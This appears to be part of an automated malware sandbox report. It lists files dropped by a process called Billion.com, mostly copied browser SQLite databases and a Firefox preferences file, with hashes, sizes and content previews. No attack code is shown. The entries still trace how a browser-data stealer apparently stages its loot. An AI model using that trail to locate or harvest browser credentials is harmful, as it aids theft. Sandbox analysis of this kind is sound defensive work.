                                                                                                                                                                                                                                                                                                        SHA-512:E89615B66B7999600EC6FA5AF31BDBB5D3985A948ABBC44CF3CC8B63B4662C3D4FCFBA3A17A50DDDE4E02B4226ED75D83FD57A940469F8C5A6A37289797BF1AD
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\ProgramData\IMYUKNY5XBIE\6XLN7YM7G

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):51200
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                                                                                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                                                                                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                                                                                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\ProgramData\IMYUKNY5XBIE\7YC2NG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):294912
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.08436837154972243
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v2:51zkVmvQhyn+Zoz67f
                                                                                                                                                                                                                                                                                                        MD5:BDDB3A7A4643B027E8E743D32B86297D
                                                                                                                                                                                                                                                                                                        SHA1:AACAA39E60FB34908241F75550B1CEDDA50E37D1
                                                                                                                                                                                                                                                                                                        SHA-256:13BC4A6A15651C116209341E97255C67980005927DFD9E91236E2E1517AF97EF
                                                                                                                                                                                                                                                                                                        SHA-512:9A6244248CA636DB12AEC2E56DEAEAA2D62ED8378EA5A1D9947938DA15CA66BC4EDF11BF7CCC92E43734449EBECD03CF538BB61FCF90798DEBFD65098BC2A444
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\ProgramData\IMYUKNY5XBIE\DB1DBA

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                                        MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                                        SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                                        SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                                        SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\ProgramData\IMYUKNY5XBIE\HDJEU3

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):10237
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.498288591230544
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
                                                                                                                                                                                                                                                                                                        MD5:0F58C61DE9618A1B53735181E43EE166
                                                                                                                                                                                                                                                                                                        SHA1:CC45931CF12AF92935A84C2A015786CC810AEC3A
                                                                                                                                                                                                                                                                                                        SHA-256:AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
                                                                                                                                                                                                                                                                                                        SHA-512:DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                                                        C:\ProgramData\IMYUKNY5XBIE\OHVAS2

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):155648
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\ProgramData\IMYUKNY5XBIE\QIWBS2NOP

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\ProgramData\IMYUKNY5XBIE\S0RQI5

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):98304
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\15c66898-1364-46f6-9558-c69f08d6e0f7.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):46191
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.0872308975583
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:qMkbJrT8IeQc5dKH+ki1zNt9Xi9vVx+DzJ6PRLv9N2aPeCiozJDSgzMMd6qD47uW:qMk1rT8H1KGXi9tD98aPeFoztSmd6qEL
                                                                                                                                                                                                                                                                                                        MD5:0C2F55F2810889C7E4C8ECEF40681771
                                                                                                                                                                                                                                                                                                        SHA1:D96380800C91DC478DBF29FB14C5FE1B9C8361AA
                                                                                                                                                                                                                                                                                                        SHA-256:FFFA8156C8E7892E4242BE478CE4163C0882C1E0643376AFA3E87D0B15893D10
                                                                                                                                                                                                                                                                                                        SHA-512:067F933FDCB416EBA5B04CCA0F5FE3E9D05B903C6B1587AE4F5F8E78093B2DE9E42D77923CBF0D70E8D034051088AFDAF7B8F87416A20204AB96157853177873
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379538500667114","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"b801fd64-6919-4229-a38a-8914add27428"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6q

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\1ea36486-44d9-4e4c-914a-2caf7d71c58a.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44922
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.094890164157997
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWcBi1zNt9Xi9vV90D0sFLEVKJDSgzMMd6qD47u3+CO:+/Ps+wsI7ynEXi9t7KtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:B6486EDCFE7EC256465FBD94C65151CC
                                                                                                                                                                                                                                                                                                        SHA1:6AB9889AA6D83CCFA04862D8E07DDCF31517038B
                                                                                                                                                                                                                                                                                                        SHA-256:3A90483165D0E00667819A4FC2921CD8DEE4CA876BFBA2225E8D5020BED5E26D
                                                                                                                                                                                                                                                                                                        SHA-512:6A051F288452EFCC863D1622BA82F279BB7C1A1F7AD47BCED199CAF09FA4FC12186FFC0AA823C80C77A1E103421CEE6C8984016715004FC82A1F67454B5CF503
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2e840f67-0a4f-46af-bedb-2e3373b4deb8.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.08983633118473
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWjdi1zNtPM8kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynNXkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:DC1D934C1906D196754BA8C1310935B9
                                                                                                                                                                                                                                                                                                        SHA1:E8AA09E10D511EB6414BA6A471E4BF46B9BE88B3
                                                                                                                                                                                                                                                                                                        SHA-256:18114B0A45CCB2E3501BEC4CC5B8E733215B1CE8D8E1CAFDF07DAF4E2728C671
                                                                                                                                                                                                                                                                                                        SHA-512:1011B8D60922B8D87A93284803F1ED8D7B898CA55976E3D12B55C6633FBE22B4103CC16DADA99C81B58A235107DF7C310FC2CF2B5CF9D0108ABE030DC2691E9A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\67adee28-dbfd-451a-a632-7017508364e2.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44996
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.095359097095448
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4xWoBi1zNt9Xi9vVx+DzJ6PRLvKJDSgzMMd6qD47u3+7:+/Ps+wsI7yO4Xi9tDKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:30F8A61041E3646AC096D9DCA4249891
                                                                                                                                                                                                                                                                                                        SHA1:DADD99A19D333404F4B7C4129CDDB679942FC4CE
                                                                                                                                                                                                                                                                                                        SHA-256:7D4D085D803EAEC035E55BE9761F6DC98E3717CB744C476550A160E4FF46871C
                                                                                                                                                                                                                                                                                                        SHA-512:DC6C139ACD8DFDC5D252BA0F65495AE769ADAF75CD84B767EC973F6A0EF307807F220D95ECD5BC1D51287ABB96B2A9B01650D06F7D881B026437A1A4A8E0EF0B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\8c977ee2-efc1-421d-abea-071398d076c1.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44930
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.095030682540709
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWcBi1zNt9Xi9vVxwxNQsPeGKJDSgzMMd6qD47u3+CO:+/Ps+wsI7ynEXi9t0KtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:C5C719D948684AC649D09EBFD8719922
                                                                                                                                                                                                                                                                                                        SHA1:4E4278B3BDFD4A715FE933EE68F70CBC87CF20B9
                                                                                                                                                                                                                                                                                                        SHA-256:912D6E164AF3574D21FBB491572620C055842B1C0241E1C6A5D35964F2E9E2C2
                                                                                                                                                                                                                                                                                                        SHA-512:019A88D2522646436A138D847C37AF1406B493FE869EEFD10AEB83952EFAD7CA2B393A8001AF7B64E9EDA5F695615ABAACF30B6FFBCCBBE753EEF83244B80F0E
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\8fc179a4-813f-456f-93c7-e361276637f2.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44914
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.09515843332724
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWcBi1zNt9Xi9vVNxxTU4P6KJDSgzMMd6qD47u3+CiB:+/Ps+wsI7ynEXi9t6KtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:619AB52F00800C714E1CB4738CAC6F2D
                                                                                                                                                                                                                                                                                                        SHA1:827F20CEC8220A2E5945192445C2886131311D21
                                                                                                                                                                                                                                                                                                        SHA-256:A126B16BD25778062B2264D04DE2C4C02A7089584A6CA1AB987D9DE35D880DE9
                                                                                                                                                                                                                                                                                                        SHA-512:4B85D0267C0518E7BA270A2F7F654C865ACB42950C3E23FFBB4442C336576D3ECC2CC95CBE200A3BA44DC25B3A7F92868AE5A66ED214EE159223B8B09B9482CC
                                                                                                                                                                                                                                                                                                        Malicious:false
